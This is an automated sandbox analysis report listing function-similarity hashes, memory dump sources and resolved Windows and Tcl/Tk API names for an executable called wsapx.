                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                • Instruction ID: 8cf246ce7ccc8ac08b8049cb71a15c70054e4f13a4d62fc080e80120e3b928d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49B1BD32A0878587E764DF69E05027CBBA4F789F68FA48135CA4E57399CF39D442C760
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                • Instruction ID: 39eecddadff3d123b607d730f20df7b02873bd3b157102f35cec40bd1a004a09
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D811272A1878187EB74DF59B54237ABA95FBC5BE4FA04235DA8D03B84CE3CE4058B10
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                • Instruction ID: 81acf1a7a5e1a02d9523a07ab2cb8fb17e1ca5e70a27678668166aa19e97d0f8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27611F22F0C19247F726AD6CA48427DE6A0AFE0FF0F944239D61D466C5DE7DE8428F20
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                • Instruction ID: 0b7b1ad3cd954ab2c0618d886b9cb2ffe34868b624c2e7c00da9a5458c93d66a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8551A5B6A5865287E7259F69E040278B3A0EB89FB8F644231CE4C57794CF3AEC43D750
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                • Instruction ID: 59bd4b6246f1c3c1521a9166d8ce1a7f8cd465e535a887ca4a0938654e6deb65
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73516E76A1865187E7649F69E044238B7A0EBD9F78F649231CE8D07798CF3AE843C750
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                • Instruction ID: 46a31758cd5ca094a4563c8ce4cad88f0c42f41b3487ef795a781b5a5c059c58
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E45186B6A5865183E7249F69E04032873B0EB84FB8FA84131CA4D57794DF7AE943D750
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                • Instruction ID: 974c62040fbfb089980a1be5d8d2f2388fa8137f4cfc4f0186dbf8c7194a5b20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09518F76A1865187F7249F69E440229B7A0EB84F68FA4C132CE4D177A8CF3AEC53C750
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                • Instruction ID: 7f8661e85dbff17d43d96779a1dc1347a7cf6f02485d0d5c0519daf58b1f2d9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B051B1B6A5865187E7249F68E14123CA3A1EB84FB8F645031CE4D17794CF3AE853D760
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                • Instruction ID: ed950f88d3a0be6ef986e6ee661154cbd19345900948b38d02f8a1be1ce7c47c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C851D4B2A6865187E7249F69E044378B3A1EB84FB8FA44131DE4C07798CF3AE843D754
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                • Instruction ID: 507ab6c085842ddf94e9afc60cd82b16ede344e2615832170ec98ee68da7babe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E41D7A2C0974A47E9659DA819146B8DF849FE2FB0DF812B0DD99633C7DD0C69878121
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                • Instruction ID: e000eabb9b931abb4a9cc5d8cb9a05f22a8a22267a40371cf11f985b546d4ded
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9941F632714A5583FF04DF6AEA141A9B3A5FB88FE0B899436DE0D97B58DE3CD5428300
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                • Instruction ID: b033331b521f4ec9761a17043ca70a256cc32b69066a6e0b07bfc51e4d36f6f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731E332B08B4286E764AF66B88512EA6D5EBC5FE0F944238EA5D53BD5DF3CD0038714
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                • Instruction ID: 85f95f50889b62ab415cf861dc9cf02de98ffa812dbc61cc4f8df341e2ece32e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F06271B186968BDBA8DF69B842629B7D0F7587D0F808039E68D83B04DE3CD0628F14
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                • Instruction ID: fa1f5582e30352a1973bc6382e6711538be11d1b50202af016a3677bf2845e89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AA001A291C84AD2E659AF00B891025A320BBA1B20B800075E44E410B1EE2CA506D620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction ID: e44c84c5f4c6194a316a7a0326b91a82db1aba1e61f16489c3dffb044bcd3d5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2302C56095DB0793FA56BF65B895578A270AFE8F74FC41436C85E02660EF3CB24B8630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C71B88A7,?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B821C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
